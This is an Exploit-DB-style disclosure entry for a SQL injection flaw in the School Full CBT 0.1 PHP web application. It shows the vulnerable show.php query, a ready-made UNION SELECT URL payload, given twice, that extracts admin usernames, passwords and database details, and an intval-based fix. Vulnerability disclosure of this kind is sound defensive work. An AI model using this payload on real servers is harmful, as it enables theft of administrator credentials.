School Full CBT SQL Injection

vendor:

School Full CBT

by:

lahilote

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: School Full CBT

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: xampp

2016

School Full CBT SQL Injection

The audit_list in /show.php is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL code. This can be done by appending the malicious code to the 'show' parameter in the URL. For example, http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+

Mitigation:

Simple method's use the php function intval.

Source

Exploit-DB raw data:

# Exploit Title.............. School Full CBT SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A


The audit_list in /show.php
-------------------------------

----snip----

$get = $_GET['show'];
	$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());

----snip----


Example exploitation
--------------------

http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+


How to fix
----------
Simple method's use the php function intval.
For example

$get = intval($_GET['show']);
	$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());


Credits
-------
This vulnerability was discovered and researched by lahilote

References
----------
http://www.sourcecodester.com/node/9859
http://php.net/manual/en/function.intval.php